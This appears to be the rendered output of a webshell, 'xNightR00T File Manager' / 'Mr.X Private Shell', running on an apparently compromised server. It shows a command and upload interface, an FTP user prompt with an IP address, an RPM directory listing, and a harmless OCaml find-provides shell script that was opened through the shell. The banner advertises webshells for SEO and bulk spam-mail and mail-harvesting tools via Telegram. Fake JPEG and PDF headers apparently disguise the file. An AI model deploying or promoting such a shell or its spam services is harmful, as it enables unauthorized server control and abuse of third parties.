xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
#!/bin/sh -
# OCaml-specific "find-provides" for RPM.
# By Richard W.M. Jones <rjones@redhat.com>
# $Id: ocaml-find-provides.sh,v 1.2 2007/09/06 11:49:59 rjones Exp $

#set -x

# Usage:
#   (1) If you don't want the module to depend on the exact compiler
#   version then use ocaml-find-requires.sh -c, but this is not something
#   you should do normally.
#
#   (2) For any modules which you want to ignore, use '-i Modulename'.

OCAMLOBJINFO=ocamlobjinfo
TEMP=`getopt -o i:f: -n ocaml-find-provides.sh -- "$@"`
if [ $? != 0 ]; then echo "ocaml-find-provides.sh: failed" >&2; exit 1; fi
eval set -- "$TEMP"

ignore_modules=nOTREAL

while true; do
    case "$1" in
	-i) ignore_modules="$2 $ignore_modules"; shift 2;;
	-f) OCAMLOBJINFO="$2"; shift 2;;
	--) shift; break;;
	*) echo "ocaml-find-provides.sh: option error at $1"; exit 1;;
    esac
done

# Get the list of files.
files=`sed "s/['\"]/\\\&/g"`

# Get list of .cmi, .cmo and .cma files.
files=`echo $files | tr '[:blank:]' '\n' | grep '\.cm[ioa]$'`

if [ -z "$files" ]; then exit 0; fi

# Get the list of modules exported by the files.
modules=`$OCAMLOBJINFO $files |
          grep -E '(Unit|Module) name: ' |
          awk '{print $3}'`

# Turn list of modules into a regexp that matches the module names.
modules_re=`echo $modules | sed 's/ /|/g'`
ignore_modules_re=`echo $ignore_modules | sed 's/ /|/g'`

# Get a list of the modules these file(s) provide.
$OCAMLOBJINFO $files |
grep -Eo '[0-9a-f]{32}[[:space:]]+[A-Za-z0-9_]+' |
grep -E '[0-9a-f]{32}[[:space:]]+'"($modules_re)\$" |
while read md5sum module; do
    echo "ocaml($module) = $md5sum"
done |
grep -Ev "$ignore_modules_re" |
sort -u

Filemanager

Name Type Size Permission Actions
fileattrs Folder 0755
gnupg Folder 0755
macros.d Folder 0755
platform Folder 0755
suse Folder 0755
appdata.prov File 333 B 0755
brp-compress File 2.07 KB 0755
brp-python-bytecompile File 2.96 KB 0755
brp-python-hardlink File 658 B 0755
brp-strip File 536 B 0755
brp-strip-shared File 704 B 0755
brp-suse File 275 B 0755
check-buildroot File 1.21 KB 0755
check-files File 1.07 KB 0755
check-prereqs File 418 B 0755
check-rpaths File 1.01 KB 0755
check-rpaths-worker File 4.93 KB 0755
convertdb1 File 6.26 KB 0755
debugedit File 31.91 KB 0755
debuginfo.prov File 309 B 0755
desktop-file.prov File 602 B 0755
elfdeps File 14.48 KB 0755
find-debuginfo.sh File 11.48 KB 0755
find-lang.sh File 8.26 KB 0755
find-provides File 3.47 KB 0755
find-provides.ksyms File 2.01 KB 0755
find-requires File 4.41 KB 0755
find-requires.ksyms File 1.81 KB 0755
find-supplements File 418 B 0755
find-supplements.ksyms File 2.7 KB 0755
firmware.prov File 218 B 0755
fontconfig.prov File 489 B 0755
gem_build_cleanup.sh File 667 B 0755
gem_install.sh File 7.78 KB 0755
gem_packages.sh File 1.67 KB 0755
gem_packages.template File 9.27 KB 0644
generate_buildrequires.sh File 5.35 KB 0755
libtooldeps.sh File 707 B 0755
macros File 44 KB 0644
macros.perl File 473 B 0644
macros.php File 192 B 0644
macros.python File 906 B 0644
mono-find-provides File 1.08 KB 0755
mono-find-requires File 2 KB 0755
ocaml-find-provides.sh File 1.62 KB 0755
ocaml-find-requires.sh File 2.08 KB 0755
perl.prov File 5.72 KB 0755
perl.req File 8.02 KB 0755
pkgconfigdeps.sh File 1.25 KB 0755
python-macro-helper File 635 B 0755
pythondeps.sh File 875 B 0755
rpm.supp File 688 B 0644
rpmdb_dump File 14.36 KB 0755
rpmdb_load File 26.45 KB 0755
rpmdb_loadcvt File 1.43 KB 0755
rpmdb_recover File 10.38 KB 0755
rpmdb_stat File 14.33 KB 0755
rpmdb_upgrade File 10.34 KB 0755
rpmdb_verify File 10.33 KB 0755
rpmdeps File 10.68 KB 0755
rpmdumpheader File 10.25 KB 0755
rpmpopt-4.11.2 File 9.47 KB 0644
rpmrc File 16.58 KB 0644
rpmsort File 2.76 KB 0755
rubygemsdeps.rb File 5.71 KB 0755
script.req File 322 B 0755
suse_macros File 10.55 KB 0644
symset-table File 807 B 0755
sysvinitdeps.sh File 280 B 0755
tgpg File 929 B 0755
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1